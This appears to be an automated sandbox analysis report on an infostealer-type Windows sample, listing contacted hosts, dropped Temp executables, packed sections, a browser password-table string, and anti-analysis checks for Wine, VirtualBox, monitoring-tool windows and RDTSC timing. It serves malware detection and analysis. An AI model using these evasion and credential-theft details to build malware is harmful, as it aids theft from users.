Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1342613182.000000000597F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: s31ydU1MpQ.exe, 00000000.00000003.1341740721.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptc
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: s31ydU1MpQ.exe, 00000000.00000003.1413578451.0000000005947000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414257749.000000000594A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1414085786.0000000005947000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: s31ydU1MpQ.exe, 00000000.00000003.1391350534.0000000005A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: s31ydU1MpQ.exe, 00000000.00000003.1318169876.000000000131E000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.0000000001314000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1296382256.000000000130E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: s31ydU1MpQ.exe, 00000000.00000003.1296434845.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1318672251.00000000012FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49742 version: TLS 1.2

System Summary

Source: s31ydU1MpQ.exe Static PE information: section name:
Source: s31ydU1MpQ.exe Static PE information: section name: .idata
Source: s31ydU1MpQ.exe Static PE information: section name:
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name:
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: .idata
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name:
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: .idata
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF52D 0_3_012FF52D
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF570 0_3_012FF570
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF245 0_3_012FF245
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013175B8 0_3_013175B8
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012FF498 0_3_012FF498
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D6B63 0_3_012D6B63
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_012D7479 0_3_012D7479
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00C8E2EE 10_2_00C8E2EE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe D8DB10ABDB18394FA74BFB00C68A6AE1A40DE13CF5D0A6620A9A2F1D4571351D
Source: s31ydU1MpQ.exe, 00000000.00000003.1539102821.0000000005D3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs s31ydU1MpQ.exe
Source: s31ydU1MpQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: s31ydU1MpQ.exe Static PE information: Section: ZLIB complexity 0.9972709760273972
Source: s31ydU1MpQ.exe Static PE information: Section: npsrnsek ZLIB complexity 0.9946172875991458
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@11/4
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HXPC21YC8H3Q6AWWXLQHI1I.exe.log
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Mutant created: NULL
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File created: C:\Users\user~1\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: s31ydU1MpQ.exe, 00000000.00000003.1342976412.0000000005936000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1368274630.000000000596F000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1342888676.000000000596A000.00000004.00000800.00020000.00000000.sdmp, s31ydU1MpQ.exe, 00000000.00000003.1368379310.0000000005962000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: s31ydU1MpQ.exe Virustotal: Detection: 52%
Source: s31ydU1MpQ.exe ReversingLabs: Detection: 60%
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File read: C:\Users\user\Desktop\s31ydU1MpQ.exe
Source: unknown Process created: C:\Users\user\Desktop\s31ydU1MpQ.exe "C:\Users\user\Desktop\s31ydU1MpQ.exe"
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process created: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe "C:\Users\user~1\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe"
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process created: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe "C:\Users\user~1\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe"
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: s31ydU1MpQ.exe Static file information: File size 1843200 > 1048576
Source: s31ydU1MpQ.exe Static PE information: Raw size of npsrnsek is bigger than: 0x100000 < 0x199c00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1716963563.0000000000B02000.00000040.00000001.01000000.00000006.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Unpacked PE file: 10.2.HXPC21YC8H3Q6AWWXLQHI1I.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;tnrxecbv:EW;anayjrgy:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Unpacked PE file: 11.2.BGXAMSUR4L24WR8IH77.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;wwqufnsk:EW;dutjqjqn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;wwqufnsk:EW;dutjqjqn:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: real checksum: 0x2d28a0 should be: 0x2c6754
Source: s31ydU1MpQ.exe Static PE information: real checksum: 0x1c6b8f should be: 0x1c2eb5
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: real checksum: 0x2c49df should be: 0x2b6c61
Source: s31ydU1MpQ.exe Static PE information: section name:
Source: s31ydU1MpQ.exe Static PE information: section name: .idata
Source: s31ydU1MpQ.exe Static PE information: section name:
Source: s31ydU1MpQ.exe Static PE information: section name: npsrnsek
Source: s31ydU1MpQ.exe Static PE information: section name: lghaogpm
Source: s31ydU1MpQ.exe Static PE information: section name: .taggant
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name:
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: .idata
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: tnrxecbv
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: anayjrgy
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe.0.dr Static PE information: section name: .taggant
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name:
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: .idata
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: wwqufnsk
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: dutjqjqn
Source: BGXAMSUR4L24WR8IH77.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0131DCAC push eax; ret 0_3_0131DCAD
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0131DF75 pushad ; ret 0_3_0131DF81
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_01305418 push esi; iretd 0_3_01305422
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_0130154F push esi; retf 0_3_01301552
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013043F3 push esp; iretd 0_3_01304412
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Code function: 0_3_013031EC push esi; retf 0_3_013031EF
Source: s31ydU1MpQ.exe Static PE information: section name: entropy: 7.972189895344259
Source: s31ydU1MpQ.exe Static PE information: section name: npsrnsek entropy: 7.95317803720264
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File created: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File created: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe

Boot Survival

Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\s31ydU1MpQ.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 658312 second address: 65831C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBAD522AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 657BA3 second address: 657BB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 657BB0 second address: 657BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D0DB0 second address: 7D0DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D6C24 second address: 7D6C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FCBAD522AA6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCBAD522AB5h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D6C4A second address: 7D6C5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBACB2D11Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D6C5C second address: 7D6C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D6F31 second address: 7D6F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D70D5 second address: 7D70F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBAD522AB8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D70F8 second address: 7D710F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCBACB2D11Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D710F second address: 7D711B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCBAD522AA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D711B second address: 7D712A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jo 00007FCBACB2D12Eh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D712A second address: 7D713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jo 00007FCBAD522AA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D728F second address: 7D7295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe RDTSC instruction interceptor: First address: 7D7571 second address: 7D758D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FCBAD522AABh 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
